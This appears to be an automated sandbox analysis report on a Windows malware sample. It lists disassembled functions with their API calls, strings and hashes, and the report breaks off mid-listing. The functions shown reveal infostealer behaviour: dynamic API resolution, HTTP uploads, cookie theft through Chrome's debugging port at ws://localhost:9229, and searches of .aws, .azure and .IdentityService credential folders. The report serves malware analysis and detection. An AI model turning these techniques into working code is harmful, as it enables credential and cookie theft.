                                                                                                                                              Function 00419BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1297 419bb0-419bc4 call 419aa0 1300 419de3-419e42 LoadLibraryA * 5 1297->1300 1301 419bca-419dde call 419ad0 GetProcAddress * 21 1297->1301 1303 419e44-419e58 GetProcAddress 1300->1303 1304 419e5d-419e64 1300->1304 1301->1300 1303->1304 1306 419e96-419e9d 1304->1306 1307 419e66-419e91 GetProcAddress * 2 1304->1307 1308 419eb8-419ebf 1306->1308 1309 419e9f-419eb3 GetProcAddress 1306->1309 1307->1306 1310 419ec1-419ed4 GetProcAddress 1308->1310 1311 419ed9-419ee0 1308->1311 1309->1308 1310->1311 1312 419f11-419f12 1311->1312 1313 419ee2-419f0c GetProcAddress * 2 1311->1313 1313->1312
                                                                                                                                              APIs
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00992738), ref: 00419BF1
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00992750), ref: 00419C0A
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00992A20), ref: 00419C22
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00992A38), ref: 00419C3A
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,009929A8), ref: 00419C53
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00999720), ref: 00419C6B
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00995DB8), ref: 00419C83
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00995F98), ref: 00419C9C
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,009929C0), ref: 00419CB4
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00992A50), ref: 00419CCC
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,009929F0), ref: 00419CE5
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00992A08), ref: 00419CFD
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00995E18), ref: 00419D15
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,009929D8), ref: 00419D2E
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00992990), ref: 00419D46
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00996098), ref: 00419D5E
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,009999D8), ref: 00419D77
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00999990), ref: 00419D8F
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00996058), ref: 00419DA7
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,009997E0), ref: 00419DC0
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,009960B8), ref: 00419DD8
                                                                                                                                              • LoadLibraryA.KERNEL32(009997F8,?,00416CA0), ref: 00419DEA
                                                                                                                                              • LoadLibraryA.KERNEL32(00999978,?,00416CA0), ref: 00419DFB
                                                                                                                                              • LoadLibraryA.KERNEL32(00999A38,?,00416CA0), ref: 00419E0D
                                                                                                                                              • LoadLibraryA.KERNEL32(00999930,?,00416CA0), ref: 00419E1F
                                                                                                                                              • LoadLibraryA.KERNEL32(00999810,?,00416CA0), ref: 00419E30
                                                                                                                                              • GetProcAddress.KERNEL32(75A70000,00999840), ref: 00419E52
                                                                                                                                              • GetProcAddress.KERNEL32(75290000,009998D0), ref: 00419E73
                                                                                                                                              • GetProcAddress.KERNEL32(75290000,00999870), ref: 00419E8B
                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,00999918), ref: 00419EAD
                                                                                                                                              • GetProcAddress.KERNEL32(75450000,00995F58), ref: 00419ECE
                                                                                                                                              • GetProcAddress.KERNEL32(76E90000,00999630), ref: 00419EEF
                                                                                                                                              • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00419F06
                                                                                                                                              Strings
                                                                                                                                              • NtQueryInformationProcess, xrefs: 00419EFA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                              • String ID: NtQueryInformationProcess
                                                                                                                                              • API String ID: 2238633743-2781105232
                                                                                                                                              • Opcode ID: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                                                                                                                              • Instruction ID: 85c76ffc39373860cb8090e471c59d53cf6ad49422061259caa86ebb7f60cad9
                                                                                                                                              • Opcode Fuzzy Hash: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                                                                                                                              • Instruction Fuzzy Hash: 4DA16FB5D0A2549FC344DFA8FC889567BBBA74D301708A61BF909C3674E734AA40CF62
                                                                                                                                              Function 00405150 Relevance: 53.1, APIs: 22, Strings: 8, Instructions: 569stringnetworkmemoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1401 405150-40527d call 41aab0 call 404800 call 419030 call 41ade0 lstrlenA call 41ade0 call 419030 call 41aa50 * 5 InternetOpenA StrCmpCA 1424 405286-40528a 1401->1424 1425 40527f 1401->1425 1426 405290-4053a3 call 418cf0 call 41ac30 call 41abb0 call 41ab10 * 2 call 41acc0 call 41ac30 call 41acc0 call 41abb0 call 41ab10 * 3 call 41acc0 call 41ac30 call 41abb0 call 41ab10 * 2 InternetConnectA 1424->1426 1427 405914-4059a9 InternetCloseHandle call 418b20 * 2 call 41ad50 * 4 call 41aab0 call 41ab10 * 5 call 401550 call 41ab10 1424->1427 1425->1424 1426->1427 1490 4053a9-4053b7 1426->1490 1491 4053c5 1490->1491 1492 4053b9-4053c3 1490->1492 1493 4053cf-405401 HttpOpenRequestA 1491->1493 1492->1493 1494 405907-40590e InternetCloseHandle 1493->1494 1495 405407-405881 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ade0 lstrlenA call 41ade0 lstrlenA GetProcessHeap RtlAllocateHeap call 41ade0 lstrlenA call 41ade0 memcpy call 41ade0 lstrlenA memcpy call 41ade0 lstrlenA call 41ade0 * 2 lstrlenA memcpy call 41ade0 lstrlenA call 41ade0 HttpSendRequestA call 418b20 1493->1495 1494->1427 1649 405886-4058b0 InternetReadFile 1495->1649 1650 4058b2-4058b9 1649->1650 1651 4058bb-405901 InternetCloseHandle 1649->1651 1650->1651 1652 4058bd-4058fb call 41acc0 call 41abb0 call 41ab10 1650->1652 1651->1494 1652->1649
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                                                                                                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                                                                                                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                                                                                                                                • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                                                                                                                • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 004051E3
                                                                                                                                                • Part of subcall function 00419030: CryptBinaryToStringA.CRYPT32(00000000,004051D4,40000001,00000000,00000000,?,004051D4), ref: 00419050
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405257
                                                                                                                                              • StrCmpCA.SHLWAPI(?,009A2060), ref: 00405275
                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405390
                                                                                                                                              • HttpOpenRequestA.WININET(00000000,009A20D0,?,009A1500,00000000,00000000,00400100,00000000), ref: 004053F4
                                                                                                                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,009A1FC0,00000000,?,0099BCD8,00000000,?,00421B0C,00000000,?,0041541F), ref: 00405787
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0040579B
                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 004057AC
                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 004057B3
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 004057C8
                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000000), ref: 004057DF
                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004057F9
                                                                                                                                              • memcpy.MSVCRT(?), ref: 00405806
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 00405818
                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405831
                                                                                                                                              • memcpy.MSVCRT(?), ref: 00405841
                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,?), ref: 0040585E
                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405872
                                                                                                                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040589D
                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405901
                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040590E
                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405918
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
                                                                                                                                              • String ID: ------$"$"$"$--$------$------$------
                                                                                                                                              • API String ID: 2335077847-2774362122
                                                                                                                                              • Opcode ID: b231c5aab874d7deeff89452049e2e9364ee2e7d83ab6a2cf917c15032d4adfd
                                                                                                                                              • Instruction ID: 17d44de56e64bdd087ca749706e31b97a9426ac18b0a434e790be536538602ee
                                                                                                                                              • Opcode Fuzzy Hash: b231c5aab874d7deeff89452049e2e9364ee2e7d83ab6a2cf917c15032d4adfd
                                                                                                                                              • Instruction Fuzzy Hash: 34321071A22118ABCB14EBA1DC65FEE7379BF54714F00419EF10662092EF387A98CF59
                                                                                                                                              Function 004059B0 Relevance: 46.0, APIs: 19, Strings: 7, Instructions: 493networkstringmemoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1660 4059b0-405a6b call 41aab0 call 404800 call 41aa50 * 5 InternetOpenA StrCmpCA 1675 405a74-405a78 1660->1675 1676 405a6d 1660->1676 1677 406013-40603b InternetCloseHandle call 41ade0 call 40a210 1675->1677 1678 405a7e-405bf6 call 418cf0 call 41ac30 call 41abb0 call 41ab10 * 2 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41ac30 call 41abb0 call 41ab10 * 2 InternetConnectA 1675->1678 1676->1675 1687 40607a-4060e5 call 418b20 * 2 call 41aab0 call 41ab10 * 5 call 401550 call 41ab10 1677->1687 1688 40603d-406075 call 41ab30 call 41acc0 call 41abb0 call 41ab10 1677->1688 1678->1677 1762 405bfc-405c0a 1678->1762 1688->1687 1763 405c18 1762->1763 1764 405c0c-405c16 1762->1764 1765 405c22-405c55 HttpOpenRequestA 1763->1765 1764->1765 1766 406006-40600d InternetCloseHandle 1765->1766 1767 405c5b-405f7f call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41ade0 lstrlenA call 41ade0 lstrlenA GetProcessHeap HeapAlloc call 41ade0 lstrlenA call 41ade0 memcpy call 41ade0 lstrlenA call 41ade0 * 2 lstrlenA memcpy call 41ade0 lstrlenA call 41ade0 HttpSendRequestA 1765->1767 1766->1677 1876 405f85-405faf InternetReadFile 1767->1876 1877 405fb1-405fb8 1876->1877 1878 405fba-406000 InternetCloseHandle 1876->1878 1877->1878 1879 405fbc-405ffa call 41acc0 call 41abb0 call 41ab10 1877->1879 1878->1766 1879->1876
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                                                                                                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                                                                                                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                                                                                                                                • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                                                                                                                • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405A48
                                                                                                                                              • StrCmpCA.SHLWAPI(?,009A2060), ref: 00405A63
                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405BE3
                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,009A2000,00000000,?,0099BCD8,00000000,?,00421B4C), ref: 00405EC1
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 00405ED2
                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00405EE3
                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00405EEA
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 00405EFF
                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000000), ref: 00405F16
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 00405F28
                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405F41
                                                                                                                                              • memcpy.MSVCRT(?), ref: 00405F4E
                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F6B
                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F7F
                                                                                                                                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F9C
                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00406000
                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040600D
                                                                                                                                              • HttpOpenRequestA.WININET(00000000,009A20D0,?,009A1500,00000000,00000000,00400100,00000000), ref: 00405C48
                                                                                                                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00406017
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                                                                                                              • String ID: "$"$------$------$------$S`A$S`A
                                                                                                                                              • API String ID: 1406981993-1449208648
                                                                                                                                              • Opcode ID: e36aebfa4fe699eb37950cce293270fe74b310e2921227364ad6402dac35e269
                                                                                                                                              • Instruction ID: 528bda5bfb4e43d7cafc1c43cb8ffcda3f2e6465d8e228b0a039cdd5195e34d5
                                                                                                                                              • Opcode Fuzzy Hash: e36aebfa4fe699eb37950cce293270fe74b310e2921227364ad6402dac35e269
                                                                                                                                              • Instruction Fuzzy Hash: 1412FC71925128ABCB14EBA1DCA5FEEB379BF14714F00419EF10662091EF783B98CB59
                                                                                                                                              Function 00409BE0 Relevance: 35.1, APIs: 15, Strings: 5, Instructions: 141stringCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00409A50: InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A
                                                                                                                                              • memset.MSVCRT ref: 00409C33
                                                                                                                                              • lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 00409C48
                                                                                                                                              • lstrcatA.KERNEL32(?,00000000), ref: 00409C5E
                                                                                                                                              • connect_to_websocket.CHROME(?,00000000), ref: 00409C76
                                                                                                                                              • memset.MSVCRT ref: 00409C9A
                                                                                                                                              • lstrcatA.KERNEL32(?,cookies), ref: 00409CAF
                                                                                                                                              • lstrcatA.KERNEL32(?,004212C4), ref: 00409CC1
                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00409CD5
                                                                                                                                              • lstrcatA.KERNEL32(?,004212C8), ref: 00409CE7
                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00409CFB
                                                                                                                                              • lstrcatA.KERNEL32(?,.txt), ref: 00409D0D
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 00409D17
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 00409D26
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                              • memset.MSVCRT ref: 00409D7E
                                                                                                                                              • free_result.CHROME(00000000), ref: 00409D8B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcat$memset$lstrlen$InternetOpenconnect_to_websocketfree_resultlstrcpy
                                                                                                                                              • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                                                                                                                              • API String ID: 2548846003-3542011879
                                                                                                                                              • Opcode ID: 8fe7c3fcfe360faa22593f97e4113398223892f47f8f887075de07db9a8ee46e
                                                                                                                                              • Instruction ID: dd0e0b2e904cac6dcb4644251d8498bdcd69e700431b121c7f08c254ac6fdba9
                                                                                                                                              • Opcode Fuzzy Hash: 8fe7c3fcfe360faa22593f97e4113398223892f47f8f887075de07db9a8ee46e
                                                                                                                                              • Instruction Fuzzy Hash: 97517E71D10518ABCB14EBE0EC55FEE7738AF14306F40456AF106A70D1EB78AA48CF69
                                                                                                                                              Function 00414FC0 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 119stringCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00414FD7
                                                                                                                                                • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                                                                                                                              • lstrcatA.KERNEL32(?,00000000), ref: 00415000
                                                                                                                                              • lstrcatA.KERNEL32(?,\.azure\), ref: 0041501D
                                                                                                                                                • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                                                                                                                                • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                                                                                                                              • memset.MSVCRT ref: 00415063
                                                                                                                                              • lstrcatA.KERNEL32(?,00000000), ref: 0041508C
                                                                                                                                              • lstrcatA.KERNEL32(?,\.aws\), ref: 004150A9
                                                                                                                                                • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                                                                                                                                • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                                                                                                                                • Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                                                                                                                                • Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2
                                                                                                                                              • memset.MSVCRT ref: 004150EF
                                                                                                                                              • lstrcatA.KERNEL32(?,00000000), ref: 00415118
                                                                                                                                              • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00415135
                                                                                                                                                • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C00
